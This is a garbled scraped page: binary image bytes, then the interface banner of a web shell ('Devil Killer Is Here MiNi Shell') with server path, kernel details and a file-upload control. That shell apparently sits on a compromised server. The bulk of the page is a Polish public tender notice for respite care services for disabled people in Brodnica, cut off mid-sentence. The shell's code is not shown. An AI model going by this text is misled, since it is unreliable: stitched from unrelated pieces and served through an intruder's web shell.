JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240612/0036401801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług całodobowej opieki wytchnieniowej w Gminie Miasta Brodnicy w roku 2024” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Brodnickie Centrum Usług Społecznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 382558849</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ustronie 2B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brodnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">564984933, 564982742</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">564984933 wew. 223</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@bcus.brodnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bcus.brodnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług całodobowej opieki wytchnieniowej w Gminie Miasta Brodnicy w roku 2024” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ff7f5d5e-28c5-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00364018</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00028479/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 „Świadczenie usług całodobowej opieki wytchnieniowej w Gminie Miasta Brodnicy w roku 2024”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ff7f5d5e-28c5-11ef-87ba-8eb060fd7bb8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Środkiem komunikacji elektronicznej, w niniejszym postępowaniu, jest „Platforma e-Zamówienia”, zwana dalej „Platformą”, która jest dostępna pod adresem https://ezamowienia.gov.pl <br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>Niniejsze postępowanie jest dostępne dla Wykonawców pod adresem prowadzonego postępowania. Poniżej link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia: <br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ff7f5d5e-28c5-11ef-87ba-8eb060fd7bb8<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (zakładka „Przeglądaj postępowania/konkursy”) przez unikatowy identyfikator (ID) przedmiotowego postępowania: ocds-148610-ff7f5d5e-28c5-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania zawarto w Rozdziale VII i IX SWZ.<br/>Postępowanie o udzielenie niniejszego zamówienia prowadzone jest, przy użyciu wskazanych w SWZ środków komunikacji elektronicznej, pisemnie w języku polskim z zastrzeżeniem co do sposobu i rodzaju przekazywanych plików i informacji. Dokumenty sporządzone w języku innym niż polski składa się wraz z ich tłumaczeniem na język polski. <br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. <br/>Szczegółowe informacje, w tym wymagania techniczne i organizacyjne, na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl (link bezpośredni do treści Regulaminu - https://ezamowienia.gov.pl/pl/regulamin/) oraz informacje zamieszczone w zakładce „Centrum Pomocy” oraz „FAQ” dostępne pod adresem https://ezamowienia.gov.pl/pl/komponent-edukacyjny/ . Instrukcje interaktywne przeznaczone dla Wykonawców są dostępne bezpośrednio pod adresem https://ezamowienia.gov.pl/pl/instrukcje-interaktywn_category/dla-wykonawcy/ . <br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452). <br/>Szczegółowe wyjaśnienia dot. sporządzenia dokumentów elektronicznych przekazywanych w postępowaniu zawarto w Rozdziale IX SWZ. <br/>W przedmiotowym postępowaniu ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, zgodnie z ich definicjami zawartymi w Rozdziale I ust. 8 SWZ. <br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia, który stanowi m.in. że w celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest: <br/>1)	Komputer PC o minimalnych parametrach: <br/>a) Intel Core2 Duo, 2 GB RAM, HDD; <br/>b) zainstalowany jeden z poniższych systemów operacyjnych: MS Windows 7 lub nowszy lub OSX/Mac OS 10.10 lub Ubuntu 14.04; <br/>c) zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza lub Firefox 59.0 lub nowszy lub Safari 11.1 lub nowsza lub Edge 14.0 i nowsze <br/>albo <br/>2)	Tablet/Telefon o minimalnych parametrach:<br/>a.	4 rdzenie procesora, <br/>b.	2GB RAM,<br/>c.	Android 6.0 Marshmallow, iOS 10.3, <br/>d.	Przeglądarka Chrome 61 lub nowsza.<br/>3)	Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej transmisji danych SSL, obsługi Java Script, oraz cookies; <br/>4)	Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych: <br/>a)	specyfikacja połączenia – formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>b)	format danych oraz kodowanie: formularze dostępne są w formacie HTML z kodowaniem UTF-8, <br/>c)	oznaczenia czasu odbioru danych: wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do sekundy, <br/>5)	posiadanie ważnego (aktualnie obowiązującego): kwalifikowanego podpisu elektronicznego do podpisywania plików w formie elektronicznej lub podpisu zaufanego lub podpisu osobistego do podpisywania plików w postaci elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 oraz art. 14 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwane dalej „RODO” informuje się, że:<br/>1)	administratorem danych osobowych jest Dyrektor Brodnickiego Centrum Usług Społecznych (dane kontaktowe Brodnickie Centrum Usług Społecznych, ul. Ustronie 2 B, 87-300 Brodnica, woj. Kujawsko-Pomorskie).<br/>2)	Wyznaczono inspektora ochrony danych, z którym można się kontaktować pisemnie na adres: Brodnickie Centrum Usług Społecznych ul. Ustronie 2 B, 87-300 Brodnica, woj. Kujawsko-Pomorskie lub telefonicznie 564983349 lub drogą elektroniczną iod@bcus.brodnica.pl<br/>3)	Pani / Pana dane będą przetwarzane w oparciu o art. 6 ust. 1 lit. c RODO (Dz.Urz.UE.L.2016.119 z 04 maja 2016 r.) w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/>4)	Odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (art. 18, art. 74), jak również inne podmioty upoważnione do odbioru danych osobowych na podstawie przepisów prawa lub zawartych z Administratorem umów, w tym podmioty zajmujące się obsługą informatyczną Administratora.<br/>5)	Dane po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane do celów archiwalnych i przechowywane przez okres niezbędny do zrealizowania przepisów dotyczących archiwizowania danych obowiązujących u Administratora lub okresu trwałości projektu w przypadku otrzymania dofinansowania ze środków zewnętrznych.<br/>6)	Zamawiający informuje, że będzie przetwarzał dane osobowe w zakresie wskazanym w otrzymanej ofercie, dokumentach składanych przez wykonawcę oraz w publicznie dostępnych rejestrach i bazach danych np. CEIDG, KRS (art. 14 ust. 1 lit. d, art. 14 ust. 2 lit. f).<br/>7)	Posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b)	na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych, które są nieprawidłowe oraz prawo do uzupełnienia Pani/Pana danych osobowych, które są niekompletne. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (na adres Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. <br/>8)	Obowiązek podania przez Panią / Pana danych osobowych Zamawiającemu jest wymogiem związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>9)	Dane osobowe nie będą przetwarzane w sposób opierający się na zautomatyzowanym przetwarzaniu. Decyzje nie będą podejmowane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani / Panu:<br/>a)	prawo do przenoszenia danych osobowych,<br/>b)	prawo do wycofania zgody na przetwarzanie danych osobowych,<br/>c)	prawo do wniesienia sprzeciwu wobec przetwarzania danych,<br/>d)	prawo do usunięcia danych osobowych, przed okresem o którym mowa w Rozdziale I ust. 10 pkt 5 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BCUS.271.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia części I pn. „Całodobowa opieka wytchnieniowa świadczona w systemie weekendowym” jest świadczenie usług opieki wytchnieniowej dla szacunkowej liczby 15 osób posiadających orzeczenie o znacznym stopniu niepełnosprawności albo orzeczenie traktowane na równi z ww. orzeczeniem zgodnie z art. 5 i art. 62 ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, w wymiarze nieprzekraczającym 14 dni dla każdej osoby.<br/>Szczegółowy przykładowy opis zadań wykonywanych w ramach realizacji przedmiotu zamówienia zawarto w dalszej części niniejszego rozdziału SWZ, przy czym zakres świadczonych usług każdorazowo będzie indywidualnie określany i będzie wynikał z bieżących potrzeb osób z niepełnosprawnościami korzystających z opieki. <br/>Na chwilę obecną Zamawiający nie planuje zlecać usług opieki wytchnieniowej na rzecz dzieci, o których mowa w Programie, co w trakcie realizacji umowy zawartej w wyniku rozstrzygnięcia niniejszego postępowania może ulec zmianie. Z dotychczasowych doświadczeń Zamawiającego wynika, że preferowaną formą korzystania z ww. usługi są pobyty weekendowe nie krótsze niż dwie doby (48 h) zwielokrotniane do czasu wyczerpania limitu dni przyznanych Programem na jedną osobę.<br/>Szacunkowy czas realizacji tej części zamówienia będzie wynosił ok. 210 dób, tj. ok. 5040 godzin. Szacunkowa liczba osób jednocześnie skierowanych do Wykonawcy w tym samym czasie, wynosi ok. 5 osób. Zamawiający informuje, że w przypadku, gdy możliwości organizacyjne Wykonawcy będą umożliwiały jednoczesne skierowanie większej liczby osób, szczegóły realizacji usług będą ustalane indywidualnie z Wykonawcą w trakcie realizacji umowy.<br/>Zamawiający informuje, że wartości wskazane powyżej dotyczące liczby: osób z niepełnosprawnościami oraz liczby dni świadczonych usług są wyłącznie szacunkowe i mogą ulec zmianom. Tym samym, Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia liczby dób i/lub osób skierowanych do Wykonawcy, w trakcie realizacji zawartej umowy, stosownie do aktualnych potrzeb Zamawiającego oraz limitu przyznanych środków finansowych, co Wykonawca akceptuje składając ofertę w niniejszym postępowaniu. <br/>Realizacja tej części zamówienia, zgodnie ze złożonym wnioskiem o przyznanie środków finansowych w ramach Programu „Opieka wytchnieniowa” dla Jednostek Samorządu Terytorialnego – edycja 2024, może się odbywać w placówce/placówkach wskazanej/-ych w części V ust. 6 pkt 2: lit. c, lit. f, lit. g oraz lit. i ww. Programu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</p> <p class="mb-0">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert: <br/>1)	Cena (C) –waga 60,00 punktów <br/>2)	Gotowość (G) – waga 40,00 punktów. <br/>2.	Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów za wszystkie kryteria oceny ofert wg wzoru LP = C +G, gdzie: <br/>LP - to całkowita liczba punktów przyznana ofercie, <br/>C - liczba punktów przyznana ofercie za kryterium „Cena”, <br/>G – to liczba punktów przyznana ofercie za kryterium „Gotowość”.<br/>Końcowy wynik zostanie zaokrąglony do dwóch miejsc po przecinku. <br/>3.	Ocenie będą podlegały oferty nieodrzucone, zgodnie z zapisami Rozdziału XV SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gotowość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia części II pn. „Całodobowa opieka wytchnieniowa świadczona w systemie tygodniowym” jest świadczenie usług opieki wytchnieniowej dla szacunkowej liczby 26 osób posiadającymi orzeczenie o znacznym stopniu niepełnosprawności albo orzeczenie traktowane na równi z ww. orzeczeniem zgodnie z art. 5 i art. 62 ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, w wymiarze do 14 dni dla każdej osoby. <br/>Szczegółowy przykładowy opis zadań wykonywanych w ramach realizacji przedmiotu zamówienia zawarto w dalszej części niniejszego rozdziału SWZ, przy czym zakres świadczonych usług każdorazowo będzie indywidualnie określany i będzie wynikał z bieżących potrzeb osób niepełnosprawnych korzystających z opieki. <br/>Na chwilę obecną Zamawiający nie planuje zlecać usług opieki wytchnieniowej na rzecz dzieci, o których mowa w Programie, co w trakcie realizacji umowy zawartej w wyniku rozstrzygnięcia niniejszego postępowania może ulec zmianie. Z dotychczasowych doświadczeń Zamawiającego wynika, że preferowaną formą korzystania z ww. usługi są pobyty kilkudniowe nie krótsze niż 7 dni (168 h) jednorazowo, zwielokrotniane do czasu wyczerpania limitu dni przyznanych Programem na jedną osobę i nie dłuższe niż 14 dni (336 h).<br/>Szacunkowy czas realizacji tej części zamówienia będzie wynosił ok. 364 doby, tj. ok. 8736 godzin. Szacunkowa liczba osób jednocześnie skierowanych do Wykonawcy w tym samym czasie, wynosi ok. 6 osób. Zamawiający informuje, że w przypadku, gdy możliwości organizacyjne Wykonawcy będą umożliwiały jednoczesne skierowanie większej liczby osób, szczegóły realizacji usług będą ustalane indywidualnie z Wykonawcą w trakcie realizacji umowy.<br/>Zamawiający informuje, że wartości wskazane powyżej dotyczące liczby: osób z niepełnosprawnościami oraz liczby dni świadczonych usług są wyłącznie szacunkowe i mogą ulec zmianom. Tym samym, Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia liczby dób i/lub osób skierowanych do Wykonawcy, w trakcie realizacji zawartej umowy, stosownie do aktualnych potrzeb Zamawiającego oraz limitu przyznanych środków finansowych, co Wykonawca akceptuje składając ofertę w niniejszym postępowaniu. <br/>Realizacja tej części zamówienia, zgodnie ze złożonym wnioskiem o przyznanie środków finansowych w ramach 